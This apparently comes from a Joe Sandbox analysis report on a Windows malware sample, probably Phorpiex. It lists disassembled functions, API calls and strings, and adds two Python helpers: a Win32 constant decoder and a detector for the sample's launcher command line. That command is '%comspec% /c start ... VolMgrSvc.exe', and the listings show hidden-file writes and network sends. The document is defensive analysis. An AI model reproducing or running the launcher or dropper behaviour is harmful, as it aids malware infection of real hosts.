                                                                                • String ID:
                                                                                • API String ID: 3956458805-0
                                                                                • Opcode ID: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction ID: 34cf97d68150feb52ab64e4c1d62c08212747bf40ca63f75f299d91bb9f0c47d
                                                                                • Opcode Fuzzy Hash: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction Fuzzy Hash: 5D313A74A40308EBEB10DBA4CD4ABAFB770EB44704F208529E601772D0D7B96A81CF99
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,00000000,0040BDA2,006A0266,?,0040BDBE,00000000,0040D09C,?), ref: 0040600F
                                                                                • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                                • CreateFileW.KERNEL32(0041A630,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                                • LeaveCriticalSection.KERNEL32(0041A400,?,?,?,?,?,?,0040BDBE,00000000,0040D09C,?), ref: 00406248
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                • String ID:
                                                                                • API String ID: 1457358591-0
                                                                                • Opcode ID: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction ID: 2241f90cca7a27a2546e95c76b2552fd8efe4d50fa40d22b7b041634b3385480
                                                                                • Opcode Fuzzy Hash: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction Fuzzy Hash: 4271CFB4E002099BCB04CF94D985FEFB7B1AB48304F14857DE505BB382D779A951CBA6
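The API traces in this report print every Win32 argument as a raw DWORD (80000000, 00000003, 20000005, 00020019), which hides what the sample is actually asking the OS for. The helper below is an added triage example, not code from the Joe Sandbox report or from the sample: it parses trace lines in the report's own format and names the constants from the Windows SDK headers. Run over lines copied from this page it shows the read-only file mapping at 0040B7CD (GENERIC_READ, OPEN_EXISTING, PAGE_READONLY, FILE_MAP_READ), the CreateFileW at 004061C5 creating its output with CREATE_ALWAYS and FILE_ATTRIBUTE_HIDDEN, the HttpQueryInfoA level 20000005 decoding to HTTP_QUERY_CONTENT_LENGTH with HTTP_QUERY_FLAG_NUMBER, and the RegOpenKeyExW further down opening HKEY_LOCAL_MACHINE with KEY_READ. The decoding tables cover only the APIs that appear on this page, and the comma re-join heuristic assumes a string argument is never itself exactly eight hex digits.

```python
"""Decode the raw Win32 constants in Joe Sandbox API-trace lines.

Added triage helper, not part of the sandbox report or of the sample. Constant values
are from the Windows SDK headers; only triage-relevant arguments are decoded, the rest
pass through exactly as the report prints them.
"""
import re

TRACE_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")      # one DWORD as the report prints it

# Exact-value enumerations (winnt.h / winreg.h / wininet.h).
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
HKEY_ROOTS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
HTTP_QUERY_INFO = {1: "HTTP_QUERY_CONTENT_TYPE", 5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}
# Bit-flag sets: every set bit is named, leftover bits are printed as hex.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE"}
FILE_ATTRIBUTES = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x04: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL"}
FILE_MAP_ACCESS = {0x01: "FILE_MAP_COPY", 0x02: "FILE_MAP_WRITE", 0x04: "FILE_MAP_READ"}
KEY_ACCESS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20000: "STANDARD_RIGHTS_READ"}
KEY_COMPOSITES = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x4: "CLSCTX_LOCAL_SERVER"}
HTTP_QUERY_FLAGS = {0x20000000: "HTTP_QUERY_FLAG_NUMBER", 0x40000000: "HTTP_QUERY_FLAG_SYSTEMTIME", 0x80000000: "HTTP_QUERY_FLAG_REQUEST_HEADERS"}


def enum(table):
    return lambda v: table.get(v, f"0x{v:X}")


def flags(table, composites=None):
    def decode(v):
        if composites and v in composites:       # well-known combinations first (KEY_READ etc.)
            return composites[v]
        names, rest = [], v
        for bit, name in table.items():
            if rest & bit:
                names.append(name)
                rest &= ~bit
        if rest or not names:                    # unknown bits, or a plain zero
            names.append(f"0x{rest:X}")
        return "|".join(names)
    return decode


def http_query_level(v):
    # dwInfoLevel: header id in the low bits, modifier flags in the top nibble.
    info = HTTP_QUERY_INFO.get(v & 0x0FFFFFFF, f"0x{v & 0x0FFFFFFF:X}")
    mods = v & 0xF0000000
    return f"{info}|{flags(HTTP_QUERY_FLAGS)(mods)}" if mods else info


# API name -> {zero-based argument index: decoder}
DECODERS = {
    "CreateFileW": {1: flags(GENERIC_ACCESS), 4: enum(CREATION_DISPOSITION), 5: flags(FILE_ATTRIBUTES)},
    "CreateFileMappingW": {2: enum(PAGE_PROTECTION)},
    "MapViewOfFile": {1: flags(FILE_MAP_ACCESS)},
    "RegOpenKeyExW": {0: enum(HKEY_ROOTS), 3: flags(KEY_ACCESS, KEY_COMPOSITES)},
    "InternetOpenA": {1: enum(INTERNET_OPEN_TYPE)},
    "HttpQueryInfoA": {1: http_query_level},
    "CoCreateInstance": {2: flags(CLSCTX)},
    "Sleep": {0: lambda v: f"{v} ms"},
}


def split_args(raw):
    """Split on commas, re-joining string arguments (e.g. a User-Agent) that contain commas."""
    out = []
    for tok in raw.split(","):
        is_atom = tok == "?" or HEX_RE.match(tok)
        if out and not is_atom and not (out[-1] == "?" or HEX_RE.match(out[-1])):
            out[-1] += "," + tok                 # continuation of the previous string argument
        else:
            out.append(tok)
    return out


def decode_trace_line(line):
    """Parse one trace line; returns None for lines that are not API calls."""
    m = TRACE_RE.search(line)
    if not m:
        return None
    args = split_args(m.group("args")) if m.group("args") else []
    table = DECODERS.get(m.group("api"), {})
    decoded = [table[i](int(a, 16)) if i in table and HEX_RE.match(a) else a
               for i, a in enumerate(args)]
    return {"api": m.group("api"), "module": m.group("module"), "ref": m.group("ref"),
            "args": args, "decoded": decoded}


def annotate(lines):
    """Render each API line as NAME(decoded args) @ref; non-API lines are skipped."""
    return [f"{d['api']}({', '.join(d['decoded'])}) @{d['ref']}" for d in map(decode_trace_line, lines) if d]


# Constructed input: trace lines copied from this report, plus one non-API line.
SAMPLE_TRACE = [
    "• InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7",
    "• HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F",
    "• Sleep.KERNEL32(000003E8), ref: 0040EF7D",
    "• CreateFileW.KERNEL32(0041AC50,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD",
    "• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE",
    "• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D",
    "  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A",
    "• CreateFileW.KERNEL32(0041A630,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5",
    r"• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394",
    "• CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423",
    "Memory Dump Source",
]
```

Calling `annotate(SAMPLE_TRACE)` prints one line per call, for example `Sleep(1000 ms) @0040EF7D` and `CreateFileW(0041A630, GENERIC_WRITE, 00000000, 00000000, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, 00000000) @004061C5`. Values the report shows as `?` or as plain handles (`000000FF`) are left untouched, since the trace does not say what they resolved to.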
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction ID: 7a529818069a58d4d2ae4584624926d6a8b7ee91a4ee1179ae14f9cec19009dd
                                                                                • Opcode Fuzzy Hash: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction Fuzzy Hash: FC412AB5A0020ADFCB04DF99C884BAFB7B9FF48304F108569E515A7390D778AE85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction ID: 0dd75c4ae2219cb0414d4c222623d171442623ab9389109279868d9d6e555a3a
                                                                                • Opcode Fuzzy Hash: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction Fuzzy Hash: FA413C74A0020ADFCB04CF99D884BAFB7B5BF58304F508969E505A7390D779EA91CF94
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction ID: 37460acbf0a505b6a9388cec97320328f7083b01a8d1f88c89259c7d7d106706
                                                                                • Opcode Fuzzy Hash: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction Fuzzy Hash: A031E172200315ABC710AFB5ED8CAD7B7A8FF44324F04463EF58AD3280DB79A4449B99
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                                • CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423
                                                                                • wsprintfW.USER32 ref: 00406456
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstancewsprintf
                                                                                • String ID: %comspec%$/c start %s & start %s\VolMgrSvc.exe$Gh@
                                                                                • API String ID: 2038452267-1176807594
                                                                                • Opcode ID: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction ID: 2c6fb4a3d0a1bb960828f31a0de6db084021911c18f79e55e776afc792a10ffb
                                                                                • Opcode Fuzzy Hash: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction Fuzzy Hash: 1931C975A40208EFCB04DF98D885FDEB7B5EF88704F208199E519A73A5CB74AE81CB54
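The wsprintfW format string in this function, `%comspec% /c start %s & start %s\VolMgrSvc.exe`, builds a launcher command line: a single cmd /c that starts two targets, the second of which is always a file named VolMgrSvc.exe in a directory filled in at run time. The check below is an added detection example, not code from the report or from the sample. It flags any `cmd /c start X & start Y` chain in a process-creation event and escalates when Y ends in VolMgrSvc.exe; the events and every path in them are constructed test data shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine), and this page does not show what fills the two %s on a live host.

```python
"""Flag the cmd.exe launcher pattern built by the wsprintfW format on this page:

    %comspec% /c start %s & start %s\\VolMgrSvc.exe

Added detection example, not part of the sandbox report or of the sample. The
process-creation events below are constructed test data shaped like Sysmon Event ID 1
fields (Image, ParentImage, CommandLine); none of the paths come from the report.
"""
import re

# cmd.exe (or the unexpanded %comspec%) running "/c start <a> & start <b>".
LAUNCHER_RE = re.compile(
    r'^\s*"?(?P<cmd>%comspec%|(?:[a-z]:\\[^"\s]*\\)?cmd(?:\.exe)?)"?\s+/c\s+'
    r'start\s+(?P<first>"[^"]+"|\S+)\s*&\s*start\s+(?P<second>"[^"]+"|\S+)\s*$',
    re.IGNORECASE)

# File name the sample's format string hard-codes for the second start target.
PHORPIEX_DROPPER_NAME = "volmgrsvc.exe"


def _unquote(s):
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == '"' else s


def classify_command_line(cmdline):
    """Return None for non-matching lines, else the two start targets and a verdict."""
    m = LAUNCHER_RE.match(cmdline)
    if not m:
        return None
    first, second = _unquote(m.group("first")), _unquote(m.group("second"))
    second_name = second.rsplit("\\", 1)[-1].lower()
    verdict = ("phorpiex_volmgrsvc_launcher" if second_name == PHORPIEX_DROPPER_NAME
               else "chained_start")   # generic: two executables started from one cmd /c
    return {"first": first, "second": second, "verdict": verdict}


def scan_events(events):
    """Run the classifier over process-creation events; returns one alert per hit."""
    alerts = []
    for ev in events:
        hit = classify_command_line(ev.get("CommandLine", ""))
        if hit:
            alerts.append({"Image": ev.get("Image"), "ParentImage": ev.get("ParentImage"), **hit})
    return alerts


# Constructed events (made-up hosts, users and paths).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Users\victim\Downloads\invoice.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c start C:\Users\victim\Downloads\invoice.exe & start C:\Users\victim\VolMgrSvc.exe'},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c start notepad.exe & start calc.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c dir C:\Users'},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd /c start "" "C:\Program Files\App\app.exe"'},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["verdict"], "->", alert["second"])
```

The generic `chained_start` verdict is deliberately noisy on its own (admin scripts chain `start` too); the pivot worth alerting on is the second target, which is also the path to collect for the dropped-file hunt.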
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction ID: 0e4cd8c02c4e5e279ec4fd0352b83bc081febda0d06dc7f405a75fcd32bf7d71
                                                                                • Opcode Fuzzy Hash: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction Fuzzy Hash: AF3109B1E0020ADFCB04DF99D884BAFB7B5EF88304F108569E514A7390D778AA85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction ID: dde9dd1fd58b67a95de0ca68c0f21478634a56bbec0f0045ca3d2b9f6da46dfd
                                                                                • Opcode Fuzzy Hash: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction Fuzzy Hash: 4F312D70A0010ADFCB04CF96D884BEFB7B5BF58304F508969E515A7390D7799991CF94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1447977647-3252725368
                                                                                • Opcode ID: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction ID: 9050299abbe0a346d3081233791c3133021d614aeebffb5e53434d9287984c88
                                                                                • Opcode Fuzzy Hash: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction Fuzzy Hash: 30310DB4C00218DFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF5A
APIs
• GetLogicalDrives.KERNEL32 ref: 00406346
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
• RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
• RegCloseKey.ADVAPI32(?), ref: 004063DE
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
• NoDrives, xrefs: 004063B8
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: CloseDrivesLogicalOpenQueryValue
• String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
• API String ID: 2666887985-3471754645
• Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
• Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
• Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
• Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
APIs
• EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
  • Part of subcall function 0040D700: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D740
  • Part of subcall function 0040D700: CloseHandle.KERNEL32(?), ref: 0040D759
• CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
• GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
• DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
• LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
• String ID:
• API String ID: 2251373460-0
• Opcode ID: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
• Instruction ID: f472e5e68ab63b0dd33345cd9092821366bebf82f5afbdb011aebb5a24a45ce9
• Opcode Fuzzy Hash: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
• Instruction Fuzzy Hash: 5D310A74A00208EFDB04DF98D889B9EBBB5FF49308F0085A9E905A7390D775EA95CF54
APIs
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: _allshl_aullshr
• String ID:
• API String ID: 673498613-0
• Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
• Instruction ID: 0b1db91c5ce03941f8675f6ecb7f2ec56fce17a7f2d6269111b0fb586e4650a4
• Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
• Instruction Fuzzy Hash: 27111F326005186B8B10EF9EC48268ABBD6EF84361B15C136FC2CDF359D634E9414BD4
APIs
• memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
• htons.WS2_32(?), ref: 00401281
• sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
Strings
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlockedhtonsmemcpysendto
• String ID: pdu
• API String ID: 2164660128-2320407122
• Opcode ID: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
• Instruction ID: 1b6d4435c5f8e1f149c0fb86e6a0c1a3006a9f031597685944d6c13f048a50c8
• Opcode Fuzzy Hash: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
• Instruction Fuzzy Hash: E931B2362083009BC710DF69D884A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
APIs
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
• InterlockedDecrement.KERNEL32(?), ref: 004018B1
  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
